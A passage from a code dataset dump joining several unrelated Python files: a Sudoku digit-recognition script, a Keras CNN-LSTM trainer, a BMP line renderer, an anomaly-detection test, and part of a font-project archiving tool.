'.png'\r\n\t\t\t\ttest_image = ds.read_image(new_path)\r\n\t\t\t\t# Computing global consistency, if globally consistent fill the board position else, \r\n\t\t\t\t# Store confidence for cell in decreasing order\r\n\t\t\t\tsupport = ds.compute_support(test_image, 100,model_refined,train_encoding)\r\n\t\t\t\tpredicted = int(inference(model, cv2.imread(new_path,0)))\r\n\t\t\t\tif support.get(predicted) > 80:\r\n\t\t\t\t\tboard[row_count][col_count] = predicted\r\n\t\t\t\telse:\r\n\t\t\t\t\tboard[row_count][col_count] 
= 0\r\n\t\t\t\t\tsemilexicalcell_pred[(row_count,col_count)]=support\r\n\t\t\t\tcol_count = col_count + 1\r\n\t\t\trow_count = row_count + 1\r\n\tprint(semilexicalcell_pred)\r\n\tprint(board)\r\n\tcnn_pred_board = copy.deepcopy(board)'''\r\n\t#Just dummy testing for the backtracking algorithm\r\n\t#semilexicalcell_pred = {(0, 0): {9: 68, 4: 21, 5: 10, 8: 1}, (0, 1): {3: 64, 5: 30, 7: 3, 9: 2, 0: 1}, (0, 4): {6: 75, 5: 11, 9: 10, 4: 4}, (1, 2): {6: 75, 5: 11, 9: 10, 4: 4}, (1, 3): {3: 76, 5: 24}, (2, 5): {9: 68, 4: 21, 5: 10, 8: 1}, (2, 7): {3: 76, 5: 24}, (2, 8): {6: 75, 5: 11, 9: 10, 4: 4}, (3, 2): {3: 76, 5: 24}, (3, 3): {9: 68, 4: 21, 5: 10, 8: 1}, (3, 6): {6: 75, 5: 11, 9: 10, 4: 4}, (4, 3): {6: 75, 5: 11, 9: 10, 4: 4}, (4, 6): {3: 76, 5: 24}, (5, 0): {6: 75, 5: 11, 9: 10, 4: 4}, (5, 5): {3: 76, 5: 24}, (6, 0): {3: 76, 5: 24}, (6, 5): {6: 75, 5: 11, 9: 10, 4: 4}, (7, 7): {6: 75, 5: 11, 9: 10, 4: 4}, (7, 8): {3: 76, 5: 24}, (8, 1): {6: 75, 5: 11, 9: 10, 4: 4}, (8, 4): {3: 76, 5: 24}}\r\n\t#board = [[0,0,5,2,0,9,7,8,1],[1,2,0,0,7,8,4,5,9],[9,7,8,1,5,0,2,0,0],[2,1,0,0,8,5,0,9,7],[5,4,7,0,9,1,0,2,8],[0,8,9,7,2,0,1,4,5],[0,5,1,8,4,0,9,7,2],[7,9,4,5,1,2,8,0,0],[8,0,2,9,0,7,5,1,4]]\r\n\t# print(semilexicalcell_pred)\r\n\tsemilexicalcell_pred = {(0, 1): {9: 50, 4: 50}, (1, 1): {3: 50, 5: 50}, (1, 2): {9: 50, 4: 50}}\r\n\tboard = [[6, 0, 1, 8, 7, 4, 5, 3, 2], [2, 0, 0, 1, 3, 9, 6, 8, 7], [8, 3, 7, 6, 2, 5, 4, 1, 9], [1, 6, 3, 9, 5, 7, 2, 4, 8], [9, 8, 2, 4, 1, 6, 7, 5, 3], [4, 7, 5, 3, 8, 2, 1, 9, 6], [3, 2, 8, 7, 4, 1, 9, 6, 5], [5, 1, 9, 2, 6, 3, 8, 7, 4], [7, 4, 6, 5, 9, 8, 3, 2, 1]]\r\n\tprint('------------------Board before-------------------')\r\n\tprint(board)\r\n\tval = check_valid_board(np.asarray(board))\r\n\tif not val:\r\n\t\tboard = sd.call_solve_sudoku(np.asarray(board),semilexicalcell_pred)\r\n\tprint('------------------Board after-------------------')\r\n\tprint(board)\r\n\t'''if not val:\r\n\t\tnew_board = create_correct_solution(board)\r\n\t\tif new_board:\r\n\t\t\tfor row in new_board:\r\n\t\t\t\tprint(row)\r\n\r\n\t\tdict_correct_cell = {}\r\n\t\tdict_incorrect_cell = {}\r\n\t\tfor j in range(0,9):\r\n\t\t\tfor k in range(0,9):\r\n\t\t\t\tif cnn_pred_board[j][k] == new_board[j][k]:\r\n\t\t\t\t\tif cnn_pred_board[j][k] in dict_correct_cell.keys():\r\n\t\t\t\t\t\tdict_correct_cell[cnn_pred_board[j][k]].append((j,k))\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tdict_correct_cell[cnn_pred_board[j][k]] = [(j,k)]\r\n\t\t\t\telse:\r\n\t\t\t\t\tif new_board[j][k] in dict_incorrect_cell.keys():\r\n\t\t\t\t\t\tdict_incorrect_cell[new_board[j][k]].append((j,k))\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tdict_incorrect_cell[new_board[j][k]]= [(j,k)]\r\n\r\n\t\tfor k in dict_incorrect_cell.keys():\r\n\t\t\tfor cell in dict_incorrect_cell[k]:\r\n\t\t\t\ttest = ds.read_image('./SudokoPerfectSolution/'+input_board[cell[0]][cell[1]]+'.png')\r\n\t\t\t\tprint('Support For :'+input_board[cell[0]][cell[1]]+'.png')\r\n\t\t\t\tds.compute_support(test, 100)\r\n\t\t\t\t\r\n\t\t\t\t# print(\"input_board[cell[0]][cell[1]]\", input_board[cell[0]][cell[1]])\r\n\t\t\t\tdistance = []\r\n\t\t\t\tfor corr_cell in dict_correct_cell[k]:\r\n\t\t\t\t\t# print(\"input_board[corr_cell[0]][corr_cell[1]]\", input_board[corr_cell[0]][corr_cell[1]])\r\n\t\t\t\t\tdistance.append((k, ds.compute_distance(ds.read_image('./SudokoPerfectSolution/'+input_board[corr_cell[0]][corr_cell[1]]+'.png'),\r\n\t\t\t\t\tds.read_image('./SudokoPerfectSolution/'+input_board[cell[0]][cell[1]]+'.png'))))\r\n\t\t\t\tfor corr_cell in 
dict_correct_cell[cnn_pred_board[cell[0]][cell[1]]]:\r\n\t\t\t\t\tdistance.append((cnn_pred_board[cell[0]][cell[1]], ds.compute_distance(ds.read_image('./SudokoPerfectSolution/'+input_board[corr_cell[0]][corr_cell[1]]+'.png'), ds.read_image('./SudokoPerfectSolution/'+input_board[cell[0]][cell[1]]+'.png'))))\r\n\t\t\t\tdistance.sort(key = lambda x: x[1])\r\n\t\t\t\tprint(distance)'''","sub_path":"HandwrittenSodukuExperiments/Inference.py","file_name":"Inference.py","file_ext":"py","file_size_in_byte":12811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"139205756","text":"class ConsistencyResultData:\n    \n    def __init__(self):\n        self.possibleOperations = ['INSERT', 'UPDATE', 'DELETE']\n        self.operationDict = {};\n        for operation in self.possibleOperations:\n            self.operationDict[operation] = [];\n    \n    def add(self, operation, time, delay):\n        if not operation in self.possibleOperations:\n            raise Exception('Illegal operation: ' + str(operation));\n        resultTuple = (time, delay);\n        self.operationDict[operation].append(resultTuple);\n\n    def getAvarageDelayForOperation(self, operation):\n        if not operation in self.possibleOperations:\n            raise Exception('Illegal operation: ' + str(operation));\n        averageDelay = 0;\n        operationCounter = 0;\n        for (_, delay) in self.operationDict[operation]:\n            averageDelay += delay;\n            operationCounter += 1;\n        if operationCounter == 0:\n            return -1;\n        return averageDelay/operationCounter;\n    \n    def printResults(self):\n        for operation in self.operationDict:\n            print("=== " + operation + " ===");\n            for (time, delay) in self.operationDict[operation]:\n                print(str(time) + "," + str(delay));","sub_path":"front_end/plot/ConsistencyResultData.py","file_name":"ConsistencyResultData.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"360788016","text":"\"\"\"\n@Project :线程\n@Time :2018/8/28 12:55\n@Author :Zhenxian\n@File :定时器.py\n@Software :PyCharm\n\"\"\"\nfrom threading import Timer\n\n\ndef hello():\n    print("Hello,world!")\n\n\nt = Timer(5, hello)\nprint("Printed after 5 seconds:")\nt.start()\n","sub_path":"线程/定时器.py","file_name":"定时器.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"214640735","text":"# export CUDA_VISIBLE_DEVICES=1,2\nimport os\nimport sys\nimport time\nimport os.path as osp\n\n# Add the parent module to the import path\nsys.path.append(osp.realpath(osp.join(osp.dirname(__file__), '../')))\n\nfrom keras.optimizers import adam\nfrom keras.initializers import glorot_uniform\nfrom keras.models import Sequential, Model, load_model\nfrom keras.callbacks import ModelCheckpoint, CSVLogger, TensorBoard, Callback\nfrom keras.layers import Dense, Activation, Flatten, Input, LSTM, TimeDistributed\n\nfrom collections import OrderedDict\nfrom _saving.SaveModelDirectory import create_path\nfrom _saving.ModelParameters import ModelParameters\n\nimport warnings\nwarnings.simplefilter("ignore", DeprecationWarning)\n\n\n__author__ = 'Daniel Garcia Zapata'\n\n# Flow From Directory\ndef obtain_datagen(datagen, train_path, h5=True):\n\treturn datagen.flow_from_directory(\n\t\t\t\ttrain_path,\n\t\t\t\ttarget_size=(img_width,img_height),\n\t\t\t\tbatch_size=batch_size,\n\t\t\t\tclass_mode='binary',\n\t\t\t\tpartition=partition) \t\n\n# Yield for data generators\ndef 
generate_data_generator_for_two_images(genX1):\n\twhile True:\n\t\tX1i = genX1.next()\n\t\tyield X1i[0], X1i[1]\n\nif __name__ == '__main__':\n\n\t__model__ = 'CNN_LSTM_Image'\n\n\tprint('Starting:', time.ctime(), '\\n')\n\n\n\t###########################################\n\t# Parameters\n\t\n\tepochs = 20\n\tbatch_size = 30\n\timpl = 2 \t\t\t# gpu\t\n\n\t###########################################\n\t# Data\n\t\n\timg_width, img_height, channels = 224, 224, 3 \t\t# Resolution of inputs\n\tinput_shape = 4096\n\n\tdataset = 'OULU-CASIA'\n\tpartition = 'prealigned'\n\tif dataset == 'OULU-CASIA':\n\t\tfrom preprocessing.image_img import ImageDataGenerator\n\n\t\ttrain_data_dir = os.path.join('..', '..', '_Dataset', dataset, 'consecutive', 'training')\t\n\t\tvalidation_data_dir = os.path.join('..', '..', '_Dataset', dataset, 'consecutive', 'validation')\n\n\t\tframes = 5\n\t\tn_output = 6\n\n\t\tnb_train_samples = 6019 / batch_size\n\t\tnb_validation_samples = 1947 / batch_size\n\n\telse:\n\t\tfrom preprocessing.image_img import ImageDataGenerator\n\n\t\ttrain_data_dir = os.path.join('..', '..', '_Dataset', dataset, '5frames', 'training')\t\n\t\tvalidation_data_dir = os.path.join('..', '..', '_Dataset', dataset, '5frames', 'validation')\n\n\t\tframes = 5\n\t\tn_output = 12\n\n\t\tnb_train_samples = 27971 / batch_size\n\t\tnb_validation_samples = 4173 / batch_size\t\t\n\n\t############################################\n\t# Model\n\n\tneurons = 512\n\tnlayers = 2\n\tdropout = 0.5\n\n\tlr = 0.0001\t\t\n\n\tactivation = 'relu'\n\tactivation_r = 'sigmoid'\n\n\t# Initialize weights\n\tweight_init = glorot_uniform(seed=3)\t\n\n\t'''\n\tLoad the output of the CNN\n\t'''\n\tcnn_model = load_model(os.path.join('weights', 'CNN_prealigned_epoch-14_val-accu-0.2636.hdf5'))\n\n\tmodel_input = Input(shape=(frames, img_width, img_height, channels), \n\t\t\t\t\t\tname='seq_input')\n\n\tx = TimeDistributed(cnn_model)(model_input)\n\tx = TimeDistributed(Flatten())(x)\n\tx = LSTM(neurons, dropout=dropout, name='lstm')(x)\n\tout = Dense(n_output, kernel_initializer=weight_init, name='out')(x)\n\n\tmodel = Model(inputs=[model_input], outputs=out)\n\n\tmodel.summary()\n\n\t''' Freeze previous layers '''\n\tfor layer in cnn_model.layers:\n\t\tlayer.trainable = False\t\t\t\n\n\t###########################################\n\t# Data Generator\n\n\tdatagen = ImageDataGenerator(\n\t\trescale=1. 
/ 224,\n\t\tshear_range=0.2,\n\t\tzoom_range=0.2,\n\t\thorizontal_flip=True)\n\n\t# Training data generators\n\ttrain_generator = obtain_datagen(datagen, train_data_dir)\n\tvalidation_generator = obtain_datagen(datagen, validation_data_dir)\n\n\t# Yield for data generators\n\tdataset_train_gen = generate_data_generator_for_two_images(train_generator)\n\tdataset_val_gen = generate_data_generator_for_two_images(validation_generator)\n\n\t############################################\n\t''' Training '''\n\n\toptimizer = adam(lr=lr)\n\tloss = 'sparse_categorical_crossentropy'\t\n\tmodel.compile(\tloss=loss,\n\t\t\t\t\toptimizer=optimizer,\t\t\n\t\t\t\t\tmetrics=['accuracy', 'top_k_categorical_accuracy'])\n\n\t'''\n\tCallbacks\n\t'''\n\trow_dict = OrderedDict({'model': __model__, \n\t\t\t\t\t\t\t'dataset': dataset,\n\t\t\t\t\t\t\t'partition': partition,\n\t\t\t\t\t\t\t'loss': loss,\n\t\t\t\t\t\t\t'lr': lr,\n\t\t\t\t\t\t\t'nlayers': nlayers,\n\t\t\t\t\t\t\t'date': time.ctime()})\n\n\t# Create Version folder\n\texport_path = create_path(__model__, dataset)\n\n\tcheckpointer = ModelCheckpoint(filepath=osp.join(export_path, __model__+'_epoch-{epoch:02d}_val-accu-{val_acc:.4f}.hdf5'), verbose=1) #, save_best_only=True) \n\tcsv_logger = CSVLogger(osp.join(export_path, '_logs_'+__model__+'.log'), separator=',', append=False)\n\ttensorboard = TensorBoard(log_dir=export_path, histogram_freq=0, batch_size=batch_size, write_graph=True, write_grads=False, write_images=False, embeddings_freq=0, embeddings_layer_names=None, embeddings_metadata=None)\n\tmodel_parameters = ModelParameters(osp.join(export_path, '_model_'+__model__+'.log'), row_dict)\n\n\tmodel.fit_generator(dataset_train_gen,\n\t\t\t\t\t\tsteps_per_epoch=nb_train_samples,\n\t\t\t\t\t\tepochs=epochs,\n\t\t\t\t\t\tvalidation_data=dataset_val_gen,\n\t\t\t\t\t\tvalidation_steps=nb_validation_samples,\n\t\t\t\t\t\tcallbacks=[checkpointer, csv_logger, tensorboard, model_parameters])\n\n\tprint('\\nEnding:', time.ctime())\n","sub_path":"Models/CNN+LSTM/LSTM_Image.py","file_name":"LSTM_Image.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"36507408","text":"from COL import COL\n\nclass COLS:\n \n def __init__(self, t):\n self.names = t\n self.all = []\n self.x = []\n self.y = []\n\n for n,s in enumerate(t):\n col = COL(n, s)\n self.all.append(col)\n if not col.isIgnored:\n if hasattr(col, 'isKlass') and col.isKlass:\n self.klass = col\n if(col.isGoal):\n self.y.append(col)\n else:\n self.x.append(col)\n ","sub_path":"src/hw5/COLS.py","file_name":"COLS.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"381928360","text":"from lib.H3iSVC import H3iSVC\nimport numpy as np\nimport utils.plot_utils as pltool\nimport matplotlib.pyplot as plt\nfrom scipy.io import loadmat\nfrom sklearn.metrics import accuracy_score as acc\nfrom sklearn.preprocessing import StandardScaler\n\nX = loadmat('../datasets/syndata.mat')['X']\ny = loadmat('../datasets/syndata.mat')['Y'].astype('int8').ravel()\nscaler = StandardScaler()\nX = scaler.fit_transform(X)\nminx, maxx = X.min(axis=0), X.max(axis=0)\ny[y != 1] = -1\nasize, nsize = y[y == 1].size, y[y == -1].size\nax = plt.subplot(2, 2, 1)\nclf = H3iSVC(C=0.1, gamma=2, similarity=0.8)\nclf.fit(X)\nax.plot(X[clf.y == -1, 0], X[clf.y == -1, 1], 'k.', ms=2)\nax.plot(X[clf.y == 1, 0], X[clf.y == 1, 1], 'ko', ms=4, mfc='none')\nerr = 
1-acc(y, clf.y)\nXX, YY = pltool.getBoxbyX(X)\ndist = clf.decision_function(np.c_[XX.ravel().reshape(XX.size, 1),\n YY.ravel().reshape(YY.size, 1)])\nax.contour(XX, YY, dist.reshape(XX.shape), levels=[clf.r], colors='k', linewidths=[2])\nax.contourf(XX, YY, dist.reshape(XX.shape), 3, cmap=plt.get_cmap('bone'), alpha=0.2)\nax.set(title='{:.2f}'.format(err))\naid = 2\nfor i in np.array([1, 5, 10]):\n ytr = np.zeros_like(y)\n anomaly_idx = np.random.choice(np.where(y == 1)[0], i)\n nomaly_idx = np.random.choice(np.where(y == -1)[0], i)\n ytr[anomaly_idx] = 1\n ytr[nomaly_idx] = -1\n clf.fit(X, ytr)\n err = 1-acc(y, clf.y)\n dist = clf.decision_function(np.c_[XX.ravel().reshape(XX.size, 1),\n YY.ravel().reshape(YY.size, 1)])\n ax = plt.subplot(2, 2, aid)\n ax.plot(X[clf.y == -1, 0], X[clf.y == -1, 1], 'k.', ms=2)\n ax.plot(X[clf.y == 1, 0], X[clf.y == 1, 1], 'ko', ms=4, mfc='none')\n ax.plot(X[anomaly_idx, 0], X[anomaly_idx, 1], 'o', ms=8, mfc='none', mec='r')\n ax.plot(X[nomaly_idx, 0], X[nomaly_idx, 1], 'o', ms=8, mfc='none', mec='b')\n ax.contour(XX, YY, dist.reshape(XX.shape), levels=[clf.r], colors='k', linewidths=[2])\n ax.contourf(XX, YY, dist.reshape(XX.shape), 3, cmap=plt.get_cmap('bone'), alpha=0.2)\n ax.set(title='Error: {:.2f}'.format(err))\n aid += 1\nplt.show()\n","sub_path":"test/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"109063423","text":"import struct\nfrom obj import Obj\nimport math\n\n\n# ===============================================================\n# Utilities\n# ===============================================================\n\ndef char(c):\n \"\"\"\n Input: requires a size 1 string\n Output: 1 byte of the ascii encoded char\n \"\"\"\n return struct.pack('=c', c.encode('ascii'))\n\n\ndef word(w):\n \"\"\"\n Input: requires a number such that (-0x7fff - 1) <= number <= 0x7fff\n ie. 
(-32768, 32767)\n Output: 2 bytes\n Example:\n >>> struct.pack('=h', 1)\n b'\\x01\\x00'\n \"\"\"\n return struct.pack('=h', w)\n\n\ndef dword(d):\n \"\"\"\n Input: requires a number such that -2147483648 <= number <= 2147483647\n Output: 4 bytes\n Example:\n >>> struct.pack('=l', 1)\n b'\\x01\\x00\\x00\\x00'\n \"\"\"\n return struct.pack('=l', d)\n\n\"Function that parses a color\"\ndef color(r, g, b):\n return bytes([b, g, r])\n\n\n# ===============================================================\n# Constants\n# ===============================================================\n\nBLACK = color(0, 0, 0)\nGREEN = color(50, 168, 82)\nBLUE = color(50, 83, 168)\nRED = color(168, 50, 60)\nWHITE = color(255, 255, 255)\n\n\n\nclass ViewPort(object):\n\n def setSize(self, x, y, width, height):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n\nclass Point(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n\n\n# ===============================================================\n# Renders a BMP file\n# ===============================================================\n\n\n\nclass Render(object):\n def __init__(self):\n self.paintColor = WHITE\n self.bufferColor = BLACK\n\n\n def glInit(self):\n self.viewPort = ViewPort()\n\n def glCreateWindow(self, width, height):\n self.width = width\n self.height = height\n self.glClear()\n\n\n def glViewPort(self, x, y, width, height):\n self.viewPort.setSize(x, y, width, height)\n\n def glClear(self):\n self.framebuffer = [\n [self.bufferColor for x in range(self.width)]\n for y in range(self.height)\n ]\n\n def glFinish(self, filename='out.bmp'):\n f = open(filename, 'bw')\n\n # File header (14 bytes)\n f.write(char('B'))\n f.write(char('M'))\n f.write(dword(14 + 40 + self.width * self.height * 3))\n f.write(dword(0))\n f.write(dword(14 + 40))\n\n # Image header (40 bytes)\n f.write(dword(40))\n f.write(dword(self.width))\n f.write(dword(self.height))\n f.write(word(1))\n f.write(word(24))\n f.write(dword(0))\n f.write(dword(self.width * self.height * 3))\n f.write(dword(0))\n f.write(dword(0))\n f.write(dword(0))\n f.write(dword(0))\n\n # Pixel data (width x height x 3 pixels)\n for x in range(self.height):\n for y in range(self.width):\n f.write(self.framebuffer[x][y])\n\n f.close()\n\n \n\n\n # Gl vertex solo normaliza las coordenadas de un solo punto\n def glVertex(self, x, y):\n currentYCordinate = self.viewPort.y + (self.viewPort.height//2) * (y + 1)\n currentXCordinate = self.viewPort.x + (self.viewPort.width//2) * (x + 1)\n self.point(currentXCordinate, currentYCordinate)\n\n def point(self, normalizedX, normalizedY):\n self.framebuffer[int(normalizedY)][int(normalizedX)] = self.paintColor\n\n def glClearColor(self, r, g, b):\n self.bufferColor = color(r,g,b)\n\n def glColor(self, r, g, b):\n self.paintColor= color(r,g,b)\n\n def line(self, x0, y0, x1, y1, transform = True):\n if transform:\n y0 = self.viewPort.y + (self.viewPort.height // 2) * (y0 + 1)\n y1 = self.viewPort.y + (self.viewPort.height // 2) * (y1 + 1)\n x0 = self.viewPort.x + (self.viewPort.width // 2) * (x0 + 1)\n x1 = self.viewPort.x + (self.viewPort.width // 2) * (x1 + 1)\n dy = abs(y1 - y0)\n dx = abs(x1 - x0)\n steep = dy > dx\n if steep:\n x0, y0 = y0, x0\n x1, y1 = y1, x1\n if x0 > x1:\n x0, x1 = x1, x0\n y0, y1 = y1, y0\n\n dy = abs(y1 - y0)\n dx = abs(x1 - x0)\n offset = 0\n threshold = 0.5 * 2 * dx\n\n y = y0\n for x in range(x0, x1 + 1):\n if steep:\n self.point(y, x)\n else:\n self.point(x, y)\n\n offset += dy * 2\n if offset >= threshold:\n y 
+= 1 if y0 < y1 else -1\n threshold += dx * 2\n\n def getLine(self, x0, y0, x1, y1):\n linePoints = []\n # y0 = self.viewPort.y + (self.viewPort.height / 2) * (y0 + 1)\n # y1 = self.viewPort.y + (self.viewPort.height / 2) * (y1 + 1)\n # x0 = self.viewPort.x + (self.viewPort.width / 2) * (x0 + 1)\n # x1 = self.viewPort.x + (self.viewPort.width / 2) * (x1 + 1)\n dy = abs(y1 - y0)\n dx = abs(x1 - x0)\n steep = dy > dx\n if steep:\n x0, y0 = y0, x0\n x1, y1 = y1, x1\n if x0 > x1:\n x0, x1 = x1, x0\n y0, y1 = y1, y0\n\n dy = abs(y1 - y0)\n dx = abs(x1 - x0)\n offset = 0\n threshold = dx\n\n y = y0\n for x in range(int(x0), int(x1) + 1):\n if steep:\n linePoints.append(Point(y, x))\n else:\n linePoints.append(Point(x, y))\n\n offset += dy * 2\n if offset >= threshold:\n y += 1 if y0 < y1 else -1\n threshold += dx * 2\n return linePoints\n\n def drawLines(self, polygon):\n yPointsLines = []\n xPointsLines = []\n lines = []\n\n for index, point in enumerate(polygon.points):\n point2 = polygon.points[(index + 1) % len(polygon.points)]\n line = self.getLine(point[0], point[1], point2[0], point2[1])\n self.line(point[0], point[1], point2[0], point2[1], False)\n for lp in line:\n lines.append(lp)\n yPointsLines.append(lp.y)\n xPointsLines.append(lp.x)\n\n # centerY = self.viewPort.height / 2\n # centerX = self.viewPort.width / 2\n\n\n minY = min(yPointsLines)\n maxY = max(yPointsLines)\n minX = min(xPointsLines)\n maxX = max(xPointsLines)\n for indexX in range(minX, maxX):\n iterableLinesX = [line for line in lines if line.x == indexX]\n for indexY in range(minY, maxY):\n iterableLinesY = [linep for linep in lines if linep.y == indexY]\n if minY < indexY < maxY:\n if minX < indexX < maxX:\n if any(i.y <= indexY for i in iterableLinesX) and any(i.y >= indexY for i in iterableLinesX):\n if any(i.x <= indexX for i in iterableLinesY) and any(i.x >= indexX for i in iterableLinesY):\n self.point(indexX, indexY)\n\n def load(self, filename, translate, scale):\n model = Obj(filename)\n\n for face in model.faces:\n vcount = len(face)\n\n for j in range(vcount):\n f1 = face[j][0]\n f2 = face[(j + 1) % vcount][0]\n\n v1 = model.vertices[f1 - 1]\n v2 = model.vertices[f2 - 1]\n\n x1 = round((v1[0] + translate[0]) * scale[0])\n y1 = round((v1[1] + translate[1]) * scale[1])\n x2 = round((v2[0] + translate[0]) * scale[0])\n y2 = round((v2[1] + translate[1]) * scale[1])\n\n self.line(x1, y1, x2, y2, False)","sub_path":"Renderer.py","file_name":"Renderer.py","file_ext":"py","file_size_in_byte":7654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"181822529","text":"import os\nimport shutil\nimport glob\nimport time\nimport plistlib\nimport re\n\n# --------\n# Settings\n# --------\n\ndef getDefaultSettings(root):\n settings = dict(\n formatVersion=0,\n compressUFOs=False,\n makeGlyphSetProof=False,\n makeVisualDiffsReport=False,\n normalizeDataInVisualDiffsReport=True,\n onlyDefaultLayerInVisualDiffsReport=True,\n archiveDirectory=getDefaultArchiveDirectory(root),\n ignore=getDefaultIgnorePatterns()\n )\n return settings\n\ndef getSettingsPath(root):\n return os.path.join(root, \"freeze dryer.plist\")\n\ndef haveSettings(root):\n path = getSettingsPath(root)\n return os.path.exists(path)\n\ndef readSettings(root):\n path = getSettingsPath(root)\n settings = getDefaultSettings(root)\n settings.update(plistlib.readPlist(path))\n return settings\n\ndef writeSettings(root, settings):\n settings = dict(settings)\n if settings[\"archiveDirectory\"] == 
getDefaultArchiveDirectory(root):\n del settings[\"archiveDirectory\"]\n if settings[\"ignore\"] == getDefaultIgnorePatterns():\n del settings[\"ignore\"]\n path = getSettingsPath(root)\n plistlib.writePlist(settings, path)\n\ndef getArchiveDirectory(root, settings):\n archiveDirectory = settings.get(\"archiveDirectory\")\n if archiveDirectory is None:\n archiveDirectory = getDefaultArchiveDirectory(root)\n return archiveDirectory\n\ndef getDefaultArchiveDirectory(root):\n return os.path.join(root, \"archive\")\n\ndef getDefaultIgnorePatterns():\n patterns = \"\"\"\n /archive\n /ignore\n *.idlk\n \"\"\"\n patterns = [line.strip() for line in patterns.splitlines() if line.strip()]\n return patterns\n\n\n# ----------\n# Initialize\n# ----------\n\ndef isViableRoot(directory):\n \"\"\"\n Determine if the given directory is a\n viable candidate to be a root.\n\n XXX:\n walk an arbitrary number of levels up\n to make sure this isn't already in a project?\n \"\"\"\n # is there a settings path?\n if haveSettings(directory):\n return False, \"The selected directory is already in use by a project.\"\n return True, \"\"\n\ndef initializeProject(root, settings):\n \"\"\"\n Initialize a project at the given root.\n \"\"\"\n writeSettings(root, settings)\n archiveDirectory = getArchiveDirectory(root, settings)\n if archiveDirectory == getDefaultArchiveDirectory(root):\n if not os.path.exists(archiveDirectory):\n os.mkdir(archiveDirectory)\n\n\n# -----\n# Diffs\n# -----\n\nstatePattern = re.compile(\"\\d\\d\\d\\d-\\d\\d-\\d\\d-\\d\\d-\\d\\d$\")\n\ndef getDiffStateCandidates(root):\n states = []\n settings = readSettings(root)\n directory = getArchiveDirectory(root, settings)\n for fileName in reversed(sorted(os.listdir(directory))):\n if not statePattern.match(fileName):\n continue\n states.append(fileName)\n states.insert(0, \"Current\")\n return states\n\ndef compileDiffReport(root, state1, state2, normalize=False, onlyCompareFontDefaultLayers=True):\n from freezeDryer import diff\n from freezeDryer import diffReport\n rootSettings = readSettings(root)\n archiveDirectory = getArchiveDirectory(root, rootSettings)\n # normalize the paths for safety\n root = os.path.normpath(root)\n archiveDirectory = os.path.normpath(archiveDirectory)\n # locate the states\n if state1 == \"Current\":\n state1 = root\n else:\n state1 = os.path.join(archiveDirectory, state1)\n if state2 == \"Current\":\n state2 = root\n else:\n state2 = os.path.join(archiveDirectory, state2)\n # locate files that should be ignored\n state1IgnoredPaths = []\n if haveSettings(state1):\n state1Settings = readSettings(state1)\n state1IgnoredPaths = gatherIgnoredPaths(state1, state1Settings[\"ignore\"])\n state2IgnoredPaths = []\n if haveSettings(state2):\n state2Settings = readSettings(state2)\n state2IgnoredPaths = gatherIgnoredPaths(state2, state2Settings[\"ignore\"])\n # compile\n differences = diff.diffDirectories(\n state1,\n state2,\n ignorePaths1=state1IgnoredPaths,\n ignorePaths2=state2IgnoredPaths,\n onlyCompareFontDefaultLayers=onlyCompareFontDefaultLayers,\n normalizeFontContours=normalize,\n normalizeFontComponents=normalize,\n normalizeFontAnchors=normalize,\n normalizeFontGuidelines=normalize\n )\n report = diffReport.makeDiffReport(differences)\n return report\n\n# ------\n# Commit\n# ------\n\ndef makeTimeStamp():\n return time.strftime(\"%Y-%m-%d-%H-%M\", time.gmtime())\n\ndef getStatePath(archiveDirectory, stamp):\n return os.path.join(archiveDirectory, stamp)\n\ndef canPerformCommit(root):\n \"\"\"\n Determine if a commit 
can be performed.\n \"\"\"\n # missing settings\n if not haveSettings(root):\n return False, \"Settings are missing.\"\n settings = readSettings(root)\n # missing archive directory\n archiveDirectory = getArchiveDirectory(root, settings)\n if not os.path.exists(archiveDirectory):\n return False, \"Archive is missing.\"\n # stamp already exists\n stamp = makeTimeStamp()\n stateDirectory = getStatePath(archiveDirectory, stamp)\n if os.path.exists(stateDirectory):\n return False, \"A state directory with this same time stamp already exists.\"\n return True, stamp\n\ndef performCommit(root, stamp, message=None, progressBar=None):\n settings = readSettings(root)\n if progressBar is not None:\n tickCount = 4\n tickCount += settings[\"compressUFOs\"]\n tickCount += settings[\"makeVisualDiffsReport\"]\n tickCount += settings[\"makeGlyphSetProof\"]\n progressBar.setTickCount(tickCount)\n if progressBar:\n progressBar.update(\"Setting up state...\")\n archiveDirectory = getArchiveDirectory(root, settings)\n # normalize the paths for safety\n root = os.path.normpath(root)\n archiveDirectory = os.path.normpath(archiveDirectory)\n # make the state directory\n stateDirectory = getStatePath(archiveDirectory, stamp)\n # locate files that should be ignored\n ignorePatterns = settings[\"ignore\"]\n ignoredPaths = gatherIgnoredPaths(root, ignorePatterns)\n def ignoreArchiveFunction(path, names):\n ignore = []\n for name in names:\n if path in ignoredPaths:\n return names\n p = os.path.join(path, name)\n if p == archiveDirectory:\n return [name]\n if p in ignoredPaths:\n ignore.append(name)\n return ignore\n # copy the whole root to the state directory\n if progressBar:\n progressBar.update(\"Copying files...\")\n shutil.copytree(root, stateDirectory, ignore=ignoreArchiveFunction)\n # remove ignored directories\n for path in ignoredPaths:\n base = os.path.relpath(path, root)\n path = os.path.join(stateDirectory, base)\n if not os.path.exists(path):\n continue\n if os.path.isdir(path):\n # there shouldn't be anything there,\n # but fail if there is just to be safe\n assert not list(os.listdir(path))\n shutil.rmtree(path)\n # write the message\n if message:\n message = message.encode(\"utf8\")\n messagePath = os.path.join(stateDirectory, makeMessageFileName(stamp))\n f = open(messagePath, \"wb\")\n f.write(message)\n f.close()\n # compress UFOs\n if settings[\"compressUFOs\"]:\n if progressBar:\n 